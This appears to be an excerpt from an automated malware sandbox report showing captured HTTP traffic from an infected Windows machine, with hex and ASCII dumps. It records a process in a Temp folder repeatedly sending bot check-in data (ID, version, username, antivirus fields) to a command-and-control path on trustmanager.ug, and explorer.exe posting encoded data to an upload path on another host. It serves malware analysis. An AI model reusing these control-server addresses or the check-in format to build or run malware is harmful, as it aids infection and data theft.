Aug 23, 2021 02:09:18.735951900 CEST	18999	OUT	Data Raw: 0e 52 4d d4 b9 a8 b3 4b 9a 2e 2b 12 83 4b 50 ee a7 06 a0 56 25 06 97 35 16 69 41 a6 4d 89 05 5b d6 8e 3c 14 9c ff 00 cb c5 52 06 ac ea fc f8 2f 3f f4 f1 5c 78 a5 a2 f5 3a f0 8b df 3c 7a 80 a4 b2 a8 c6 49 00 66 9d 8a 6b 2e e5 23 d6 bc 03 eb 0d ad Data Ascii: RMK.+KPV%5iAM[<R/?\x:<zIfk.#~M7K-hPi"3.A'kKm*je'S#o+gZ^%G6@,8=jUVzmDX7%Fs+U~:NIh4W6v
Aug 23, 2021 02:09:18.760617018 CEST	19007	OUT	Data Raw: f9 7a 6c bd 63 02 9a 74 bd 3a 41 f2 b6 da cf 57 3e 94 f5 73 53 c9 25 b3 2d 54 83 de 25 93 a0 40 df 72 5a 89 fc 3b 27 f0 48 0d 0b 2b 03 c1 35 2a dd 4a 3f 8c d1 7a ab a8 72 50 7b c4 a6 fa 1d d2 f4 50 6a 16 d3 6e 53 ac 4d 5a eb 7d 30 ea d5 32 ea 2f Data Ascii: zlct:AW>sS%-T%@rZ;'H+5*J?zrP{PjnSMZ}02/Gzdv5DO>`)^kW\|V;qBr\R$pjLLVGu.(RQbu2DPbv).}cuZxm$iR
Aug 23, 2021 02:09:18.761962891 CEST	19012	OUT	Data Raw: 61 7b 58 94 e8 15 73 ec 2d 4b f6 16 a3 d9 4b b0 7b 58 f7 29 d2 8a b9 f6 06 a7 0b 06 a6 a9 48 5e d6 3d ca 34 b5 73 ec 2d 9a 5f b0 31 a7 ec a4 2f 6b 1e e5 3a 38 ab 9f 60 6a 5f b0 1a 7e ca 41 ed 63 dc a5 41 ab a2 c1 a9 7f b3 cf ad 1e ca 42 f6 b1 ee Data Ascii: a{Xs-KK{X)H^=4s-_1/k:8`j_~AcABQgZ_Ga{hw(SN>N>^]CB}iK{h(S8i>Ji>{ZM(ROO?GWU^}}Aa>/@Wv'
Aug 23, 2021 02:09:18.812747002 CEST	19288	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.812777996 CEST	19288	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49737	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:42.239111900 CEST	12068	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: atvcampingtrips.com
Aug 23, 2021 02:08:42.239144087 CEST	12068	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 67 5e de 82 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA ,[k,vug^^yzRP\xvX)Sy>:13ECBX[{\#$Yy#a\F#)~ImiA^Ups+
Aug 23, 2021 02:08:43.103382111 CEST	12069	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:42 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.2.3	49868	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:18.771706104 CEST	19052	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:18.797714949 CEST	19286	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.797744989 CEST	19287	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:18.916929960 CEST	19388	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:18.944377899 CEST	19389	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.944423914 CEST	19389	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:19.069158077 CEST	19466	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
